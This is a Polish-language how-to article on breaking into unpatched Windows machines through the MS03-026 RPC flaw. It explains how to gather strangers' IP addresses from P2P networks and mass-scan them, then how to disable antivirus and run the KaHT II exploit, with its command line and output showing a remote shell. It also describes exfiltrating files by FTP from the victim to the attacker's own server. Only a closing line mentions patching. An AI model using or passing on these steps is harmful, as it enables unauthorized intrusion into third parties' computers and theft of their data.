Jak skutecznie wykorzystać luki w usłudze Remote Procedure Call?

Każdego dnia pojawiają się nowe odkrycia jak również nowi odkrywcy. Niektóre luki systemowe pozostają w sieci bardzo długo, ponieważ przybywa coraz więcej użytkowników. Nie można więc wymagać od nowicjuszy znajomości dość zaawansowanych technik zabezpieczających system. Średnio 7% systemów w Internecie z rodziny win32 tj. Windowsxp; 2000; Server 2003 jest podatnych na lukę MS 03-026, a około 20% na MS 03-039. Wykorzystanie tych błędów jest niezwykle proste.

A włamanie do tak niezabezpieczonego systemu zajmuje nie więcej niż 1 minutę!

Przede wszystkim potrzebny będzie skaner pojedynczych skaz systemowych. Najodpowiedniejszy w tym przypadku jest DCOM skaner. Można go bezpłatnie pobrać ze strony producenta – firmy eEye Digital Security. Teraz wystarczy wpisać zakres IP swojego segmentu sieciowego. Jeśli nie wyświetlą się żadne informacje, najlepszym sprzymierzeńcem będą rozległe sieci p2p takie jak Kazaa, torrent czy eMule. Klienckie programy owych sieci dostarczają szczegółowe informacje, między innymi IP podłączonych hostów. Tak więc w jednej chwili posiadasz kilkadziesiąt adresów sieci. Teraz wystarczy już tylko cierpliwie skanować każdy zakres po kolei. Jeśli zdalny host ma przykładowy adres 10.20.30.123 należy zaznaczyć w skanerze Range scan i wpisać odpowiednio 10.20.30.1 10.20.30.254 prędzej czy później na pewno coś Ci się trafi, gwarantuje. Jeśli skaner wyświetli taką informację xxx.xxx.xxx.xxx ? vulnerable to ms03-026\ms03-039 ? to właśnie się powiodło! Nas interesuje jedynie MS 03-026 i tego właśnie szukaj!

Teraz pozostaje pobrać uniwersalnego exploita na przykład stąd, rozpakuj go, jednak wcześniej wyłącz antivirusa jeśli jakiegoś posiadasz ponieważ wyświetli się alert i program zostanie przeniesiony do kwarantanny (w końcu to złośliwy kod). Przeciągnij KahtII.exe do wiersza poleceń i wpisz podatny segment sieciowy który znalazłeś. Na przykładzie powinno to wyglądać mniej więcej tak: KahtII.exe 10.20.30.1 10.20.30.254

KaHT.exe 10.20.30.1 10.20.30.254
_________________________________________________
KAHT II – MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r 3wdesign es
#haxorcitos && #localhost @Efnet Ownz you!!!
________________________________________________

[+] Targets: 10.20.30.0-10.30.30.254 with 300 Threads
[+] Scan In Progress…
– Connecting to 10.20.30.4
Sending Exploit to a [Win2k] Server…. FAILED
– Connecting to 10.20.30.9
Sending Exploit to a [WinXP] Server…. FAILED
Sending Exploit to a [WinXP] Server…
– Conectando con la Shell Remota…

Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>.
Jeśli mimo, że w skanerze wyświetliła się informacja o podatności, a exploit nie działa oznacza to, że wersja zdalnego systemu nie jest pokrywana przez exploita (threads) i musiałbyś znaleźć odpowiedniego w Internecie. Pamiętaj również o wyłączeniu firewalla jeśli jakiegoś posiadasz.

Szybko jednak znudzi Ci się penetracja systemu bez możliwości kopiowania. Podstawowe funkcje służące do tego celu po prostu nie działają. Jedynym rozwiązaniem jest założenie w swoim systemie serwera FTP z ustawionym uploadowaniem na kącie anonymous. Gdy już takowego mamy wystarczy zdalnie zalogować się do własnego serwera poleceniem ftp ? A xxx.xxx.xxx.xxx (gdzie xxx.xxx.xxx.xxx = twój adres) wysyłamy poleceniem put lub send (koniecznie zajrzyj do helpa systemowego!). Licz się jednak wówczas z tym, że na pewno pozostanie to w logach.

Jeśli chodzi o lukę MS 03-039 mimo, że wyszło już wiele wersji exploita to nie znalazłem do tej pory w pełni działającego, więc zagrożenie pod tym względem zdaje się być stosunkowo umiarkowane.

Jeśli zauważyłeś, że twój system jest podatny koniecznie sciągnij patche pod odpowiednią wersję windowsa! Znajdziecie je oczywiście na www.microsoft.com. Innym równie skutecznym przeciwdziałaniem jest po prostu firewall – koniecznie go zainstaluj!

Źródło: e-mail

Zobacz również:

Microsoft ostrzega przed krytycznym błędem
Hakerzy publikują exploita wykorzystującego krytyczną lukę
Skaner od Microsoftu dla administratorów sieci ?
Błędy w RPC
Eksperci ostrzegają

Da się zniszczyć Facebooka?
Anonymous vs. meksykański kart…
Nowy Android będzie bezpieczny…
Hakerzy zaatakowali usługi tel…
Microsoft przygotował “obejści…
Infekujące sajty z WordPressem…
Niebezpieczne malware na iOS 5
Stary kod tym razem atakuje Ma…
Jak “popsuć” więzienie od zewn…
Kolejny atak na centrum certyf…